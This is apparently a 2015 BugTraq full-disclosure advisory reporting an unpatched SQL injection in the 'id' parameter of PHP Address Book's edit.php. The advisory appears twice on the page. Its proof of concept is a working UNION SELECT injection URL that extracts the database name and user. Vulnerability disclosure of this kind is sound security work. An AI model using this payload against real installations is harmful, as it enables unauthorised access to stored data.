BugTraq
Back to list
|
Post reply
PHP Address Book SQL Injection Vulnerability
Nov 14 2015 09:34AM
Rahul Pratap Singh (techno rps gmail com)
## Full Disclosure
#Exploit Title : PHP Address Book SQL Injection Vulnerability
#Exploit Author : Rahul Pratap Singh
#Date : 14/Nov/2015
#Home Page Link : http://sourceforge.net/projects/php-addressbook/
#Blog Url : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Status : Not Patched
1. Description
"id" field in edit.php is not properly sanitized, that leads to SQL
Injection Vulnerability.
2. Proof of Concept
http://php-addressbook.sourceforge.net/demo/edit.php?id=null' union
select
1,2,concat(0x3c2f7469746c653e,database(),0x3a,user(),0x3c62723e),4,5,6,7
,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3
2,33,34,35,36,37,38,39,40--+
## Vendor Response
No reply from vendor
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)
iQIcBAEBAgAGBQJWRwAyAAoJEJvdRneaz31f7ekP/0x0acJ+fu4nglkevl7WpWNQ
EtTQ+PFoG+R89tb/xCiDliL01JUr/3324+h8eV4ng0w7UAho58vw1uMSg9II8Uw5
2nwYTi7pVAyrrFlP42YwRGmlTv0uSUMiVkoJcMeXnrNe4HMdzTR7gT8a+HpoX4vM
62PnNC575f0HDWYBcUroYB4SN0mrKju/dc6CPW5iAJeX13STCX8a4eKc9CfCjkWU
LWK0EqdEGINfrMcMbSBgGUTIN91bug/FeJK/w8FY4v6tUi6Vd69h5A+272FzF1+g
IaWTOTqcvvNpXTULJyUYDuSVDNb9e0wKjqzUVJXeFXnJqCsiLfJRPTBBNEcF/LoZ
JpqwDKvtfvpGeR2oZuTqH3rWAqITvMePN2/X92P5vaQyZTRDPbaKlSAN0O11P7xw
6EU4lZyDIzbcPvl4iVo9dnwGI0ER9kKNuIT+YTFkeZeHGECn9mM/qquXawc2lHRm
DYmYUdlA7+/RyHX4NvYkk67dKa3boYbIm7fCXyz6809j0UmnUdEoyp5cOJuTuu6d
sQfqNbKxCNvxjq+ET30AWb4xiAm+OcSU71BWAfOoxbL5o5RYEdTQb4LTXrQKRnAX
iDeF9Hzodzfzp+lLw4tit4zEEyBY2YYQ+p0U1/ZbTTylnBs1RmrxARWEXJ181lnT
ZmQRVnwYJg4w5Pc+Q/8g
=E1gl
-----END PGP SIGNATURE-----
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#Exploit Title : PHP Address Book SQL Injection Vulnerability
#Exploit Author : Rahul Pratap Singh
#Date : 14/Nov/2015
#Home Page Link : http://sourceforge.net/projects/php-addressbook/
#Blog Url : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Status : Not Patched
1. Description
"id" field in edit.php is not properly sanitized, that leads to SQL
Injection Vulnerability.
2. Proof of Concept
http://php-addressbook.sourceforge.net/demo/edit.php?id=null' union
select
1,2,concat(0x3c2f7469746c653e,database(),0x3a,user(),0x3c62723e),4,5,6,7
,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3
2,33,34,35,36,37,38,39,40--+
## Vendor Response
No reply from vendor
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)
iQIcBAEBAgAGBQJWRwAyAAoJEJvdRneaz31f7ekP/0x0acJ+fu4nglkevl7WpWNQ
EtTQ+PFoG+R89tb/xCiDliL01JUr/3324+h8eV4ng0w7UAho58vw1uMSg9II8Uw5
2nwYTi7pVAyrrFlP42YwRGmlTv0uSUMiVkoJcMeXnrNe4HMdzTR7gT8a+HpoX4vM
62PnNC575f0HDWYBcUroYB4SN0mrKju/dc6CPW5iAJeX13STCX8a4eKc9CfCjkWU
LWK0EqdEGINfrMcMbSBgGUTIN91bug/FeJK/w8FY4v6tUi6Vd69h5A+272FzF1+g
IaWTOTqcvvNpXTULJyUYDuSVDNb9e0wKjqzUVJXeFXnJqCsiLfJRPTBBNEcF/LoZ
JpqwDKvtfvpGeR2oZuTqH3rWAqITvMePN2/X92P5vaQyZTRDPbaKlSAN0O11P7xw
6EU4lZyDIzbcPvl4iVo9dnwGI0ER9kKNuIT+YTFkeZeHGECn9mM/qquXawc2lHRm
DYmYUdlA7+/RyHX4NvYkk67dKa3boYbIm7fCXyz6809j0UmnUdEoyp5cOJuTuu6d
sQfqNbKxCNvxjq+ET30AWb4xiAm+OcSU71BWAfOoxbL5o5RYEdTQb4LTXrQKRnAX
iDeF9Hzodzfzp+lLw4tit4zEEyBY2YYQ+p0U1/ZbTTylnBs1RmrxARWEXJ181lnT
ZmQRVnwYJg4w5Pc+Q/8g
=E1gl
-----END PGP SIGNATURE-----
[ reply ]